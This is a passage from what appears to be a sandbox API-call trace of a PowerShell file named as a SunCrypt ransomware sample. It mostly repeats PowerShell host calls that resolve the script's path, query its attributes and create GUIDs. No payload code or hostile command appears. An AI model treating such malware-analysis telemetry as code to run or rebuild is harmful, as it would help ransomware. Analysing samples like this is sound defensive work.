pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x6e930d73, Data2=0xad1f, Data3=0x4050, Data4=([0]=0x94, [1]=0x49, [2]=0xed, [3]=0x4c, 
[4]=0x5b, [5]=0x8e, [6]=0x71, [7]=0xb))) returned 0x0 [0104.597] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.597] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741345640) returned 1 [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.599] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741521411) returned 1 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa01c6b6c, Data2=0x74bd, Data3=0x48a3, Data4=([0]=0xa4, [1]=0x50, [2]=0x4e, [3]=0xfe, [4]=0xe0, [5]=0xce, [6]=0x14, [7]=0x68))) returned 0x0 [0104.599] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.600] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741626094) returned 1 [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.600] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.601] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741798584) returned 1 [0104.601] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8e06c8c2, Data2=0x8092, Data3=0x45ab, Data4=([0]=0x97, [1]=0xf, [2]=0xdd, [3]=0xa7, [4]=0x9a, [5]=0xd2, [6]=0x1f, [7]=0x24))) returned 0x0 [0104.602] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.602] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741895760) returned 1 [0104.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
lpFilePart=0x0) returned 0x3a [0104.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.604] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701742069099) returned 1 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x398889b4, Data2=0x3f3f, Data3=0x4ee4, Data4=([0]=0x8a, [1]=0x78, [2]=0x80, [3]=0xf3, [4]=0xa8, [5]=0xad, [6]=0x95, [7]=0x3b))) returned 0x0 [0104.605] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.605] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701742170593) returned 1 [0104.605] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.605] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.611] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701742765481) returned 1 [0104.611] 
EtwEventActivityIdControl () returned 0x0 [0104.611] EtwEventActivityIdControl () returned 0x0 [0104.611] EtwEventActivityIdControl () returned 0x0 [0104.612] EtwEventActivityIdControl () returned 0x0 [0104.612] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7abdfb86, Data2=0xffeb, Data3=0x4135, Data4=([0]=0x93, [1]=0x7b, [2]=0xda, [3]=0x58, [4]=0xc7, [5]=0x9a, [6]=0xe8, [7]=0x94))) returned 0x0 [0104.612] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.612] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701742909221) returned 1 [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.613] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.615] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743207576) returned 1 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9b0e72ee, Data2=0x59b7, Data3=0x40ed, Data4=([0]=0xb8, [1]=0xcb, [2]=0xf5, [3]=0x5e, [4]=0xe6, [5]=0xf4, [6]=0x42, [7]=0xfa))) returned 0x0 [0104.617] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.617] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701743352209) returned 1 [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.619] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743552015) returned 1 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdef0f5e2, Data2=0x26dd, Data3=0x4187, Data4=([0]=0xb5, [1]=0xcf, [2]=0x44, [3]=0x2d, [4]=0x9f, [5]=0xb1, [6]=0xe4, [7]=0x81))) returned 0x0 [0104.620] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.620] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701743703130) returned 1 [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.622] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743907061) returned 1 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] CoCreateGuid (in: 
pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb3912db, Data2=0xe526, Data3=0x4886, Data4=([0]=0xb1, [1]=0xf0, [2]=0xde, [3]=0x5c, [4]=0xa6, [5]=0x2f, [6]=0x5c, [7]=0x6c))) returned 0x0 [0104.623] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.624] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701744046988) returned 1 [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.624] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.627] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701744358327) returned 1 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa985e60c, Data2=0x1d7f, Data3=0x451b, Data4=([0]=0x9d, [1]=0x2a, [2]=0xbe, [3]=0xad, [4]=0xa5, [5]=0x61, [6]=0xc, [7]=0xcc))) returned 0x0 [0104.628] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.628] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701744904877) returned 1 [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.647] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701746314568) returned 1 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.648] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1f8326fc, Data2=0x56e, Data3=0x4616, Data4=([0]=0xb0, [1]=0xd7, [2]=0xaa, [3]=0x70, [4]=0x3, [5]=0x52, [6]=0x32, [7]=0x94))) returned 0x0 [0104.649] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.649] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701746569100) returned 1 [0104.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 